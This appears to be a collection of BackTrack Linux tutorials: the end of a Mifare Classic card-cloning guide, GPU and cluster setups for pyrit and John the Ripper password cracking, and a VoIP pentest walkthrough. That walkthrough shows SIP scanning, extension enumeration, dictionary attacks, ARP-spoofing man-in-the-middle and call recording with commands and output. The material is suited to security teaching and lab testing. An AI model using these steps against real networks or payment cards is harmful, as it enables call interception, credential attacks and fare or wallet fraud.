<keys.mfd> - MiFare Dump (MFD) that contain the keys (optional)Or: nfc-mfclassic x <dump.mfd> <payload.bin> x - Extract payload (data blocks) from MFD <dump.mfd> - MiFare Dump (MFD) that contains wanted payload <payload.bin> - Binary file where payload will be extracted

Keep in mind that card UID will be not affected (not changed) with this process. Buy some

blank card or Proxmark III if that is what you want. If you are now thinking about dumping

your electronic wallet right after recharge and when credit comes to zero, writing content

back, then please don't do it. What can stop you from doing that? Well, probably only your

conscience, but if the card gets blocked in 24 hours after first use then don't complain. Yes,

there are online checking and billing systems out there for basic cards.

0x04 – ISIC Issue

With ISIC- International Student Identity Card attacker can abuse around ten service not

only one. ISIC cards are widely used for entrance, transportation, dining payments and

various others services or discounts. According to homepage there are 4.5 million

cardholders in 120 countries. Cards should be replaced with more secure types ASAP. It is

possible to do much more than that, but sufficient for demonstration let's play a little...

At some universities, there is only one entry security check – ISIC. As you can see this is

trivial to bypass. We did many tests with public transportation systems and with university

systems. Results are all the same – those systems are easily hackable.

0x06 – Conclusion

Finally, when will people learn their lesson? Cryptographic algorithms should be public so

that they can be scrutinized and tested. Secret algorithms aren’t more valuable because

they are secret. Anyone needing a highly secure smart card should make sure there's

layered security and not just depend on the chip's encryption.

0x07 – What's next?

Since i have access to Proxmark III which is universal RFID hacking tool which can be

used for 100% accurate cloning (even UID), i may once write second edition about

c00king with Mifare Classic and HID Prox...

Arming BackTrack with GSM attack suite?

0x08 – Thanks

This cookbook was made with great help from h4f guys, many thanks to Vulcano and Back.

0x09 – References & Links

For further reading about this topic please see following:

http://www.cs.virginia.edu/~kn5f/pdf/K.Nohl.PhD  Implementable.Privacy.for.RFID.Sy

stems.pdf

http://events.ccc.de/congress/2007/Fahrplan/events/2378.en.html

http://packetstorm.rlz.cl/papers/wireless/2008-esorics.pdf

http://www.nethemba.com/mifare-classic-slides.pdf

http://code.google.com/p/nfc-tools/wiki/mfoc

0x0A - About

MI1 is a "full time security enthusiast" with university degree in the field of informatics.

Recently focusing his passion to USRP and RFID stuff.

This guide is a work in progress, and is meant to help those needing to get CUDA working

on their BackTrack machines.

Start by preparing your kernel sources for the Nvidia driver installation:

root@bt:~# prepare-kernel-sourcesroot@bt:~# cd /usr/src/linuxroot@bt:~# cp -rf include/generated/* include/linux/

Download Nvidia drivers according to your CPU architecture:

32 bit: http://developer.download.nvidia.com/compute/cuda/4_0_rc2/drivers/

devdriver_4.0_linux_32_270.40.run

64 bit: http://developer.download.nvidia.com/compute/cuda/4_0_rc2/drivers/

devdriver_4.0_linux_64_270.40.run

Make sure you are not in an X session (log out to console), and run the Nvidia driver

installer.

Next, download the CUDA toolkit, according to your CPU architecture:

32 bit: http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0_rc2/

toolkit/cudatoolkit_4.0.13_linux_32_ubuntu10.10.run

64 bit: http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0_rc2/

toolkit/cudatoolkit_4.0.13_linux_64_ubuntu10.10.run

Ideally you should install the CUDA toolkit to /opt. this guide assumes this installation path.

Configure your environment variables so that the nvcc command works. You can do this by

appending the following lines in your /root/.bashrc file:

PATH=$PATH:/opt/cuda/binLD_LIBRARY_PATH=$LD_LIBRARY_PATH:/opt/cuda/libexport PATH

export LD_LIBRARY_PATH

Then run:

root@bt:~# source /root/.bashrcroot@bt:~# ldconfig

The whole purpose of this was to get nvcc compiler installed. You can check that everything

is set up correctly:

root@bt:~# which nvcc/opt/cuda/bin/nvccroot@bt:~# nvcc -Vnvcc: NVIDIA (R) Cuda compiler driverCopyright (c) 2005-2011 NVIDIA CorporationBuilt on Sun_Mar_20_16:45:27_PDT_2011Cuda compilation tools, release 4.0, V0.2.1221root@bt:~#

Now that the Nvidia driver and CUDA toolkit are installed, we can test their functionality with

a GPU powered tool such as pyrit.

root@bt:~# svn checkout http://pyrit.googlecode.com/svn/trunk/ pyritroot@bt:~# cd pyrit/pyrit && python setup.py build && python setup.py installroot@bt:~# cd ../../root@bt:~# cd pyrit/cpyrit_cuda && python setup.py build && python setup.py install

Run a benchmark to see that everything works as expected:

root@bt:~# pyrit benchmarkPyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+

Running benchmark (63787.8 PMKs/s)... \

Computed 63787.82 PMKs/s total.#1: 'CUDA-Device #1 'GeForce GTX 295: 11558.7 PMKs/s (RTT 3.0)#2: 'CUDA-Device #2 'GeForce GTX 295: 10912.5 PMKs/s (RTT 2.9)

#3: 'CUDA-Device #3 'GeForce GTX 295: 10632.1 PMKs/s (RTT 3.0)#4: 'CUDA-Device #4 'GeForce GTX 295: 11654.7 PMKs/s (RTT 2.9)#5: 'CUDA-Device #5 'GeForce GTX 295: 10868.9 PMKs/s (RTT 2.9)#6: 'CUDA-Device #6 'GeForce GTX 295: 10322.8 PMKs/s (RTT 3.0)#7: 'CPU-Core (SSE2)': 500.7 PMKs/s (RTT 2.7)#8: 'CPU-Core (SSE2)': 508.9 PMKs/s (RTT 2.8)

Success! We can now use CUDA powered tools from within BackTrack.

Building a John the Ripper Cluster in Backtrack5 R2

In this tutorial we are going to build a cluster that will aid us in cracking hashes using

John the Ripper.

The first thing we want to do is install libssl-dev and mpich2 after which we configure it.

(Note: secretword must be the same on each machine.)

root@bt:~# apt-get install mpich2 libssl-devroot@bt:~# touch /etc/mpd.confroot@bt:~# chmod 600 /etc/mpd.conf root@bt:~# echo "secretword=bt" >> /etc/mpd.confroot@bt:~# touch mpd.hostsroot@bt:~# echo "192.168.1.69:1" >> mpd.hosts root@bt:~# chmod 600 mpd.hostsroot@bt:~# mpdbootroot@bt:~# mpdtrace btroot@bt:~# mpdallexit

Now we install the the MPI version of John the Ripper.

root@bt:~/Desktop# wget http://www.bindshell.net/tools/johntheripper/john-1.7.3.1-all-2-mpi8.tar.gzroot@bt:~/Desktop# tar xvfz john-1.7.3.1-all-2-mpi8.tar.gz root@bt:~/Desktop/john-1.7.3.1-all-2-mpi8/src# make clean linux-x86-sse2root@bt:~# mv -f john-1.7.3.1-all-2-mpi8 /pentest/passwords/john-mpi

After installing the MPI version of John the Ripper we configure our /etc/hosts file.

root@bt:~# nano /etc/hosts 127.0.0.1 localhost192.168.1.69 server192.168.1.70 node1

# The following lines are desirable for IPv6 capable hosts::1 localhost ip6-localhost ip6-loopbackfe00::0 ip6-localnetff00::0 ip6-mcastprefixff02::1 ip6-allnodesff02::2 ip6-allroutersff02::3 ip6-allhosts

NOTE: Do the exact same thing on the client.

Once we have the server and the client setup it's time to enable our SSH server and

transfer the configuration files from the server to the client.

root@bt:~# ssh root@192.168.1.70 mkdir -p /root/.sshroot@bt:~# cat /root/.ssh/id_rsa.pub | ssh root@192.168.1.70 'cat>>.ssh/authorized_keys'root@bt:~# scp /root/mpd.hosts root@192.168.1.70:/root/root@bt:~# scp /etc/mpd.conf root@192.168.1.70:/etc/root@bt:~# scp /etc/hosts root@192.168.1.70:/etc/

If we start the cluster we should see our server and client.

root@bt:~# mpdboot -v --file=/root/mpd.hosts -n 2running mpdallexit on btLAUNCHED mpd on bt via RUNNING: mpd on btLAUNCHED mpd on 192.168.1.70 via bt2RUNNING: mpd on 192.168.1.70

root@bt:~# mpdtrace btbt2

Now let's test our cluster.

root@bt:~# echo "admin:21232f297a57a5a743894a0e4a801fc3" > /root/testroot@bt:~# scp /root/test root@192.168.1.70:/root/root@bt:~# mpiexec -host 192.168.1.69 -np 2 /pentest/passwords/john-mpi/run/john --format:raw-MD5 /root/testLoaded 1 password hash (Raw MD5 [raw-md5])

admin (admin)admin (admin)thread: 1 guesses: 1 time: 0:00:00:00 100% (1) c/s: 160 trying: admin - adminsthread: 0 guesses: 1 time: 0:00:00:00 100% (1) c/s: 133 trying: admin - admins

Building a Pyrit Cluster Backtrack5 R2

In this tutorial we are going to build a cluster on Backtrack5 R2 using Pyrit.

Pyrit comes installed by default on Backtrack5 R2. If you have removed it, simply

use apt-get install to install it.

The first step to creating a pyrit cluster is to create a configuration file.

root@bt:~# mkdir ~/.pyritroot@bt:~# nano ~/.pyrit/configroot@bt:~# cat ~/.pyrit/config

default_storage = file://limit_ncpus = 0rpc_announce = truerpc_announce_broadcast = falserpc_knownclients = 192.168.1.69 (This is the servers IP)rpc_server = trueworkunit_size = 75000

After having the above configuration file on all our machines, we start the server.

root@bt:~# pyrit serve

Now from the client you should be able to see both cores.

NOTE: The pyrit list_cores command has a bug that when used will crash the server.

We can test our newly built cluster using pyrit's benchmark option.

root@bt:~# pyrit benchmark

If we switch to the server while running the benchmark, we can see that currently one

client is connected.

Penetration Testing VOIP with BackTrack

VoIP is an exciting technology which provides many benefits and cost effective solutions for

communication. More and more small and enterprise businesses are replacing their old

traditional telephony systems with an IP based ones. A VoIP based PBX can provide many

features such as: Multiple Extensions, Caller ID, Voice mail, IVR capabilities, Recording of

conversations, Logging, Usage with hardware based telephones or software based (aka

soft phones). Now days there are many vendors for PBX, IP telephones, VoIP services and

equipment such as: CISCO, AVAYA and ASTERISK, SNOM, THOMSON… With new

technology comes a new challenge for both the defensive and offensive side of security,

One of the “great” dangers of traditional phone lines was that it was susceptible to

eavesdropping. The “old school” way to eavesdrop on somebody’s phone line was to

physically connect a small transmitter which was connected inside or outside their premises

somewhere along the phone cord. 

IP telephony systems are also susceptible to eavesdropping, doing so in an IP environment

is a little bit more difficult to execute, detect and require more the knowledge and the right

set of tools. In this article we won’t discuss a particular vendor or technique but we will take

a look at the concepts and the tools available for attacking VoIP available for us

in Backtrack Linux. The main goal of this article is to present the tools and their purpose in

order to help you choose the right tool for the right situation. We will examine some real

world attack vectors and discover how BackTrack can assist us pentesting VoIP; we will

also examine some of the tools which present in BackTrack and their usage. 

Typical VoIP Topologies

There are several ways IP based telephony can be implemented, here are some common

topologies and usage:

Self Hosted

A PBX (i.e. Asterisk) is installed at the client site and connected to an ISP or telephony

service provider PSTN via a SIP Trunk/PRI, the VoIP traffic flows through a dedicated Vlan. 

Visio diagram by Amir Avraham

Hosted Services

There is no need for a PBX at site. Just a switch, a router, IP phones and a connection to

the service provider PBX via internet or IP/VPN connection, each phone is configured with

SIP account information. 

Online SIP Service

Services like sipme.me provides an application for pc or smart phones and a free sip

account, Offering low price for international calls and free calls between the service users

by assigning a pone number to each subscriber. 

SIP Basics

The SIP (Session Initiation Protocol) role is to setup, terminate or modify a voice or a video

call where the voice and/or video traffic are being carried by a protocol like RTP (Real time

transport Protocol). SIP is an application layer protocol which uses UDP for transport (TCP

and SCTP can be used as well).

SIP usually uses ports 5060 TCP or UDP for unencrypted signaling or 5061 for

encrypted transportation using TLS.

SIP is an ASCII based protocol which has some similar elements like in the HTTP

protocol by using a Request/Response model. Much like an HTTP request from a

browser a SIP client request is made using a SIP URI a user agent and a

method/request. SIP uses e-mail like addresses format: user/phone@domain/ip A

typical SIP URI looks like:

sip:205@192.168.1.100, sip:username@pbx.com , sip:205@192.168.1.100:5060

According to the request made by the client a response will be received with a status or error code, the following tables describe the available requests and responses in the SIP protocol.

SIP Requests / Methods

Request Description

INVITE Used to invite and account to participate in a call session.

ACK Acknowledge an INVITE request.

CANCEL Cancel a pending request.

REGISTER Register user with a SIP server.

OPTIONS Lists information about the capabilities of a caller.

BYE Terminates a session between two users in a call.

REFER

Indicates that the recipient(identified by the Request URI)

should contact a third party using the contact information

provided in the request.

SUBSCRIBE

The SUBSCRIBE method is used to request current state and

state updates from a remote

node.

NOTIFY

The NOTIFY method is used to notify a SIP node that an event

which has been requested by an earlier SUBSCRIBE method has

occurred.

An Example SIP “INVITE” Request:

INVITE sip:201@192.168.1.104 SIP/2.0Via: SIP/2.0/UDP 192.168.1.102;rport;branch=z9hG4bKvbxaoqarMax-Forwards: 70

To: From: "NightRanger" ;tag=eihggCall-ID: hfxsabthoymshub@backtrackCSeq: 649 INVITEContact: Content-Type: application/sdp

Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGESupported: replaces,norefersub,100relUser-Agent: Twinkle/1.2

Content-Length: 310

SIP Responses

Response Description

1xxInformational responses, Request received and being

processed.

2xxSuccessful responses The action was successfully received,

understood, and accepted.

3xx Redirection responses

4xxRequest failure responses The request contains bad syntax or

cannot be fulfilled at the server.

5xxServer failure responses The server failed to fulfill an

apparently valid request.

6xx Global failure responses The request cannot be fulfilled at any

server.

An Example SIP “Trying” Response:

SIP/2.0 100 TryingVia: SIP/2.0/UDP 192.168.1.102;branch=z9hG4bKpmphujka;received=192.168.1.102;rport=5060From: "NIghtRanger" ;tag=eihggTo: Call-ID: hfxsabthoymshub@backtrackCSeq: 650 INVITE

User-Agent: Asterisk PBXAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY

Supported: replacesContact: Content-Length: 0

SIP Call Between 2 Phones Example

The calling phone sends an invite.

The called phone sends back a response of 100 (Trying).

The called phone then starts to ring and sends a response of 180 (Ringing).

When the caller picks up the phone the called phone sends a response of 200

(OK).

The calling phone sends an ACK response.

Conversation begins via RTP.

When the caller hangs up the phone a BYE request is sent.

The calling phone responds with 200 (OK).

Attack Vectors

Before we get started with the tools let’s have a look at some common VoIP attack

vectors:

Information Gathering, Footprinting and Enumeration.

Monitoring Traffic and eavesdropping Phone calls.

Attacking Authentication.

VLAN Hopping.

Denial of Service / Flooding.

Spoofing Caller ID.

In order to test the tools I have setup a TRIXBOX PBX System and created 6

extensions. I will be using two soft phones, 1 is Linux based client called

Twinkle and the 2nd is a Windows based client called X-Lite. I will be using

the latest and greatest release of Backtrack Linux which is R2. You can find

Most of the VoIP attack tools in Backtrack under the “/pentest/voip/”

directory: 

root@bt:~# cd /pentest/voip/root@bt:/pentest/voip#

Or you can simply navigate using the KDE menu to the “Backtrack” → “Voice Over IP” sub menus : 

Information Gathering

This phase is where we gather information about the topology, servers and

clients to learn as much information as we can in order to launch a successful

attack. What we are interested in finding is live hosts, PBX type and version,

VoIP servers/gateways, clients (hardware and software) types and versions

etc… Instead of enumerating “usernames” we will be enumerating SIP

extensions. Let’s take a look at some of the tools which available

in Backtrack to help us find, identify and enumerate VoIP enabled devices. 

SMAP

Backtrack includes a great tool called SMAP which is a simple scanner for

SIP enabled devices SMAP sends off various SIP requests awaiting

responses from SIP enabled DSL router, proxies and user agents.

It could be considered a mash up of NMAP and sipsak. 

SMAP Usage:

root@bt:/pentest/voip/smap# ./smap

smap 0.6.0 http://www.wormulon.net/

usage: smap [ Options ]

-h: this help -d: increase debugging -o: enable fingerprinting -O: enable more verbose fingerprinting -l: fingerprint learning mode -t: TCP transport -u: UDP transport (default -P0: Treat all hosts as online - skip host discovery -p : destination port -r : messages per second rate limit -D : SIP domain to use without leading sip: -w : timeout in msec

Scanning a single host:

root@bt:/pentest/voip/smap# ./smap 192.168.1.104

smap 0.6.0 http://www.wormulon.net/

192.168.1.104: ICMP reachable, SIP enabled

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

Scanning a range of IP addresses:

root@bt:/pentest/voip/smap# ./smap 192.168.1.130/24

smap 0.6.0 http://www.wormulon.net/

192.168.1.20: ICMP reachable, SIP enabled192.168.1.22: ICMP reachable, SIP enabled192.168.1.0: ICMP unreachable, SIP disabled192.168.1.1: ICMP unreachable, SIP disabled192.168.1.2: ICMP unreachable, SIP disabled192.168.1.3: ICMP unreachable, SIP disabled----EDIT---192.168.1.250: ICMP unreachable, SIP disabled192.168.1.251: ICMP unreachable, SIP disabled192.168.1.252: ICMP unreachable, SIP disabled192.168.1.253: ICMP unreachable, SIP disabled192.168.1.254: ICMP unreachable, SIP disabled192.168.1.255: ICMP unreachable, SIP disabled

256 hosts scanned, 7 ICMP reachable, 2 SIP enabled (0.8%)

Now that we have identified sip enabled hosts we can use SMAP to fingerprint the server/client type and version: 

root@bt:/pentest/voip/smap# ./smap -O 192.168.1.104

smap 0.6.0 http://www.wormulon.net/

192.168.1.104: ICMP reachable, SIP enabledbest guess (70% sure) fingerprint: Asterisk PBX SVN-trunk-r56579 User-Agent: Asterisk PBX

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

In case SMAP could not fingerprint our host we use the –l argument to put it in learning mode to provide some useful information: 

root@bt:/pentest/voip/smap# ./smap -l 192.168.1.104

smap 0.6.0 http://www.wormulon.net/

NOTICE: test_accept: "Accept: application/sdp"NOTICE: test_allow: "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY"NOTICE: test_supported: "Supported: replaces"NOTICE: test_via: transport capitalization: 2NOTICE: test_via: "branch;alias;received;rport"NOTICE: test_via: Please add new cmpstrNOTICE: test_via: transport capitalization: 2192.168.1.104: ICMP reachable, SIP enabledbest guess (70% sure) fingerprint: Asterisk PBX SVN-trunk-r56579

FINGERPRINT information:newmethod=501accept_class=2allow_class=201supported_class=8via_class=2hoe_class=ignoreoptions=200brokenfromto=404prack=481ping=501invite=200 User-Agent: Asterisk PBX

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

Another useful feature of SMAP is the –d argument which enables debug output for verbosity try to use the –o along with it to view the fingerprinting process in details. 

root@bt:/pentest/voip/smap# ./smap -d 192.168.1.104

smap 0.6.0 http://www.wormulon.net/

DEBUG: local IP: 212.235.66.182DEBUG: local IP: 212.235.66.182DEBUG: bind() successfulDEBUG: RAW socket openDEBUG: moving 1 from S_START to S_PING

DEBUG: ICMP error Echo ReplyDEBUG: 192.168.1.104/1 request: SIP OPTIONS request (valid)

DEBUG: response belongs to task 1 (192.168.1.104)

DEBUG: ACK: ACK sip:localhost SIP/2.0Via: SIP/2.0/UDP 212.235.66.182:12345;branch=z9hG4bK.56689;alias;received=192.168.1.105;rport=5060From: ;tag=6b9ae50e67345d3bTo: ;tag=as14262fecCall-ID: 1992951560@212.235.66.182CSeq: 23915 ACKContent-Length: 0User-Agent: smap 0.6.0

--- end of ACK--192.168.1.104: ICMP reachable, SIP enabledDEBUG: destroying task 1

1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)

SIPSAK

SIPSAK is used for testing SIP enabled applications and devices using the

OPTION request method only. We can use it to fingerprint and enumeration.

You won’t find sipsak in the “/pentest/voip/ “ directory; you can execute it from

any location by simply typing sipsak. 

root@bt:~# sipsaksipsak 0.9.6 by Nils Ohlmeier

Copyright (C) 2002-2004 FhG Fokus Copyright (C) 2004-2005 Nils Ohlmeier report bugs to nils@sipsak.org

shoot : sipsak [-f FILE] [-L] -s SIPURI trace : sipsak -T -s SIPURI usrloc : sipsak -U [-I|M] [-b NUMBER] [-e NUMBER] [-x NUMBER] [-z NUMBER] -s SIPURI usrloc : sipsak -I|M [-b NUMBER] [-e NUMBER] -s SIPURI usrloc : sipsak -U [-C SIPURI] [-x NUMBER] -s SIPURI message: sipsak -M [-B STRING] [-O STRING] [-c SIPURI] -s SIPURI flood : sipsak -F [-e NUMBER] -s SIPURI random : sipsak -R [-t NUMBER] -s SIPURI

additional parameter in every mode: [-a PASSWORD] [-d] [-i] [-H HOSTNAME] [-l PORT] [-m NUMBER] [-n] [-N] [-r PORT] [-v] [-V] [-w]

-h displays this help message -V prints version string only -f FILE the file which contains the SIP message to send use - for standard input -L de-activate CR (\r) insertion in files -s SIPURI the destination server uri in form sip:[user@]servername[:port] -T activates the traceroute mode -U activates the usrloc mode -I simulates a successful calls with itself -M sends messages to itself -C SIPURI use the given uri as Contact in REGISTER -b NUMBER the starting number appendix to the user name (default: 0) -e NUMBER the ending numer of the appendix to the user name -o NUMBER sleep number ms before sending next request -x NUMBER the expires header field value (default: 15) -z NUMBER activates randomly removing of user bindings -F activates the flood mode -R activates the random modues (dangerous) -t NUMBER the maximum number of trashed character in random mode (default: request length) -l PORT the local port to use (default: any) -r PORT the remote port to use (default: 5060) -p HOSTNAME request target (outbound proxy)

-H HOSTNAME overwrites the local hostname in all headers -m NUMBER the value for the max-forwards header field -n use FQDN instead of IPs in the Via-Line -i deactivate the insertion of a Via-Line -a PASSWORD password for authentication (if omitted password="") -u STRING Authentication username -d ignore redirects -v each v produces more verbosity (max. 3) -w extract IP from the warning in reply -g STRING replacement for a special mark in the message -G activates replacement of variables -N returns exit codes Nagios compliant -q STRING search for a RegExp in replies and return error on failure -W NUMBER return Nagios warning if retrans > number -B STRING send a message with string as body -O STRING Content-Disposition value -P NUMBER Number of processes to start -A NUMBER number of test runs and print just timings -S use same port for receiving and sending -c SIPURI use the given uri as From in MESSAGE -D NUMBER timeout multiplier for INVITE transactions and reliable transports (default: 64) -E STRING specify transport to be used -j STRING adds additional headers to the request

Here is an example for using sipsak to fingerprint a sip enabled device We can see in the result that the device we queried is an Audiocodes MP-114 FXS gateway. 

root@bt:~# sipsak -vv -s sip:192.168.1.221

message received:SIP/2.0 200 OKVia: SIP/2.0/UDP 127.0.1.1:51601;branch=z9hG4bK.18a1b21f;rport;aliasFrom: sip:sipsak@127.0.1.1:51601;tag=97ac9e5To: sip:192.168.1.221;tag=1c1785761661Call-ID: 159042021@127.0.1.1CSeq: 1 OPTIONS

Contact: Supported: em,100rel,timer,replaces,path,resource-priorityAllow: REGISTER,OPTIONS,INVITE,ACK,CANCEL,BYE,NOTIFY,PRACK,REFER,INFO,SUBSCRIBE,UPDATEServer: Audiocodes-Sip-Gateway-MP-114 FXS/v.5.40A.040.005X-Resources: telchs=4/0;mediachs=0/0Accept: application/sdp, application/simple-message-summary, message/sipfragContent-Type: application/sdpContent-Length: 343

v=0o=AudiocodesGW 1785763980 1785763858 IN IP4 192.168.1.221s=Phone-Callc=IN IP4 192.168.1.221t=0 0m=audio 6000 RTP/AVP 18 8 0 127a=rtpmap:18 G729/8000a=fmtp:18 annexb=noa=rtpmap:8 PCMA/8000a=rtpmap:0 PCMU/8000a=rtpmap:127 telephone-event/8000a=fmtp:127 0-15a=ptime:20a=sendrecva=rtcp:6001 IN IP4 192.168.1.221

** reply received after 67.923 ms ** SIP/2.0 200 OK final received

SIPScan

Sip-scan is a simple scanner for sip enabled hosts it can scan a single host or

an entire subnet.

Sip-scan usage:

root@bt:/pentest/voip/sipscan# ./sip-scan --help

./sip-scan version [unknown] calling Getopt::Std::getopts (version 1.05),running under Perl version 5.10.0. Usage: sip-scan [options]

-v Be verbose. -i ip|if Interface/IP for SIP-headers (default: IP from ppp0) -p port remote port to scan. (default: 5060) -l port local origin of packets. (default: 5060) -d n[p] Wait n ms after each sent packet (default: 50ms) or if 'p' is given, send n packets per second (default: 20) -w n Wait n ms for remaining answers (default: 2000ms)

Network spec contains the wildcard * or ranges n-m.

Scanning a subnet:

root@bt:/pentest/voip/sipscan# ./sip-scan -i eth0 192.168.1.1-254192.168.1.20: Grandstream HT-502 V1.2A 1.0.1.35192.168.1.21: Grandstream HT-502 V1.2A 1.0.1.35192.168.1.22: Asterisk PBX192.168.1.104: Asterisk PBX192.168.1.128: FreeSWITCH-mod_sofia/1.0.trunk-16055192.168.1.174: Grandstream HT-502 V1.2A 1.0.1.35192.168.1.175: Asterisk PBX 1.6.0.9-samy-r27192.168.1.219: "Exelmind Call-Control Switch (CCS)"192.168.1.248: MailVision HostLynx/2.1 'GA'

SVMAP

SVMAP is a part of a suite of tools called SIPVicious and it’s my favorite

scanner of choice It can be used to scan identify and fingerprint a single IP or

a range of IP addresses. Svmap allows specifying the request method which

is being used for scanning, the default method is OPTIONS, it offers debug

and verbosity options and even allows scanning the SRV records for SIP on

the destination domain. You can use the ./svmap –h in order to view all the

available arguments 

root@bt:/pentest/voip/sipvicious# ./svmap.pyUsage: svmap.py [options] host1 host2 hostrangeexamples:svmap.py 10.0.0.1-10.0.0.255 \> 172.16.131.1 sipvicious.org/22 10.0.1.1/24 \> 1.1.1.1-20 1.1.2-20.* 4.1.*.*svmap.py -s session1 --randomize 10.0.0.1/8svmap.py --resume session1 -vsvmap.py -p5060-5062 10.0.0.3-20 -m INVITE

Scanning an IP range:

root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254| SIP Device | User Agent | Fingerprint |----------------------------------------------------| 192.168.1.104:5060 | Asterisk PBX | disabled || 192.168.1.103:5060 | Twinkle/1.4.2 | disabled |

Enabling fingerprinting scanning

root@bt:/pentest/voip/sipvicious# ./svmap.py 192.168.1.1-254 --fp

Extensions Enumeration

Extension enumeration can aid an attacker by finding valid extensions on a

VoIP system which later can lead to a brute force attack on the SIP accounts.

Extension enumeration works by examining errors returned by a sip requests

methods like REGISTER, OPTIONS and INVITE 

Svwar

Svwar is also a tool from the sipvicious suite allows to enumerate extensions

by using a range of extensions or using a dictionary file svwar supports all the

of the three extension enumeration methods as mentioned above, the default

method for enumeration is REGISTER.

Usage:

root@bt:/pentest/voip/sipvicious# ./svwar.pyUsage: svwar.py [options] targetexamples:svwar.py -e100-999 10.0.0.1svwar.py -d dictionary.txt 10.0.0.2

Example:

root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104| Extension | Authentication |------------------------------| 201 | reqauth || 200 | reqauth || 203 | reqauth || 202 | reqauth || 303 | reqauth || 305 | reqauth |

Svwar has identified all the extensions I’ve created on my Trixbox server. You can specify another sip method by using the –m argument, you can also add t –v or –vv for verbosity. 

root@bt:/pentest/voip/sipvicious# ./svwar.py -e100-400 192.168.1.104 -m INVITE -vINFO:TakeASip:trying to get self ip .. might take a whileINFO:root:start your enginesINFO:TakeASip:Ok SIP device foundINFO:TakeASip:extension '200' exists - requires authenticationINFO:TakeASip:extension '201' exists - requires authentication-----Edit----INFO:TakeASip:extension '203' exists - requires authenticationINFO:TakeASip:extension '303' exists - requires authenticationINFO:TakeASip:extension '303' exists - requires authenticationINFO:TakeASip:extension '305' exists - requires authenticationINFO:root:we have 6 extensions| Extension | Authentication |------------------------------| 201 | reqauth || 200 | reqauth || 203 | reqauth || 202 | reqauth || 303 | reqauth || 305 | reqauth |

INFO:root:Total time: 0:00:21.944731

Enumiax

Enumiax is used to enumerate Asterisk Exchange protocol usernames. It

allows for a dictionary attack or a sequential Username Guessing 

root@bt:/pentest/voip/enumiax# ./enumiaxenumIAX 1.0Dustin D. Trammell Usage: enumiax [options] target options: -d Dictionary attack using file -i Interval for auto-save (# of operations, default 1000) -m # Minimum username length (in characters) -M # Maximum username length (in characters) -r # Rate-limit calls (in microseconds) -s Read session state from state file -v Increase verbosity (repeat for additional verbosity) -V Print version information and exit -h Print help/usage information and exit

root@bt:/pentest/voip/enumiax# ./enumiax -v -m3 -M3 192.168.1.104enumIAX 1.0Dustin D. Trammell Target Aquired: 192.168.1.104Connecting to 192.168.1.104 via udp on port 4569...Starting enum process at: Sat Feb 5 13:04:18 2011Now working on 3 character usernames...

#################################Trying username: "000"#################################Trying username: "001"#################################Trying username: "002"#################################Trying username: "003"#################################Trying username: "004"#################################Trying username: "005"#################################Trying username: "006"#################################

Trying username: "007"#################################Trying username: "008"#################################...

root@bt:/pentest/voip/enumiax# ./enumiax -d dict -v 192.168.1.104enumIAX 1.0Dustin D. Trammell Target Aquired: 192.168.1.104Connecting to 192.168.1.104 via udp on port 4569...Starting enum process at: Sat Feb 5 13:02:39 2011

#################################Trying username: "guest"#################################Trying username: "iaxtel"#################################Trying username: "iaxtel2"#################################Trying username: "100"#################################Trying username: "101"#################################Trying username: "200"#################################Trying username: "201"#################################Trying username: "202"#################################Trying username: "203"End of dictionary file reached, exiting.

Monitoring Traffic and Eavesdropping Phone calls

Monitoring VoIP traffic can allow an attacker capture SIP requests and RTP

data sent from clients to server and back. It can serve two attack vectors:

Capturing SIP authentication (we will later discuss this topic in the attacking

authentication section).

Eavesdropping users phone calls.

For demonstration purposes we will use the following scenario: 

For this attack vector we will need to perform a Man in The Middle Attack

which will require the following steps:

Arp poisoning/spoofing

Sniffing traffic

Decoding RTP data to an audio file.

Arp Poisoning using Arpspoof

Before we can begin to sniff traffic we will need to arp poison our

switch/gateway, we’ll be using a tool called “Arpspoof” which is

located in “/usr/sbin/Arpspoof” folder in Backtrack, in fact you can

just invoke it from anywhere by typing: arpspoof Before we can use

arpspoof we will need to enable IP forwarding: 

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Arpspoof syntax should look as follows: 

root@bt:~# arpspoofVersion: 2.4Usage: arpspoof [-i interface] [-t target] host

For a successful MITM attack we will need to spoof both ways: 

arpspoof –t victim gatewayarpspoof –t gateway victim

We will let our Arp poisoning run in the background while performing

a capture using Wireshark. 

Capturing traffic and Eavesdropping using Wireshark

Now let’s fire up Wireshark to capture some traffic. We will use the

following Wireshark capture filter: 

not broadcast and not multicast and host 192.168.1.118

Now let’s start capturing some traffic… While sniffing for traffic User

“B” has launched the X-Lite soft phone on his desktop computer and

dialed to user “A” extension 200. 

Wireshark has captured some traffic, after a while I have stopped

the capture process and saved the sessions into a file called

“sip.pcap”. 

We can see that we have captured the SIP traffic but for this section

we are more interested in the RTP traffic because it contains the

actual conversation data. 

Wireshark has a pretty cool feature to decode captured VoIP calls

data into playable audio format You can find this feature under

the Statistics -> VoIP Calls menu. 

http://www.backtrack-linux.org/wiki/index.php/File:Sip_14.png

VoIPong

VoIPong is a utility which detects all Voice over IP calls on a

pipeline, and for those which are G711 encoded, dumps actual

conversation to separate wave files. It supports SIP, H323, Cisco's

Skinny Client Protocol, RTP and RTCP. VoIPong is located in

Backtrack “/pentest/voip/voipong” directory Before we can use

VoIPong we will need to make some changes to the voipong.conf

file: 

root@bt:/pentest/voip/voipong# nano etc/voipong.confsoxpath = /usr/bin/soxnetworksfile = /pentest/voip/voipong/etc/voipongnetsoutdir = /pentest/voip/voipong/output/device = eth0 # your network interface card name

Now we can start VoIPong to capture some VoIP conversations 

root@bt:/pentest/voip/voipong# ./voipong -c etc/voipong.conf -d4 -f

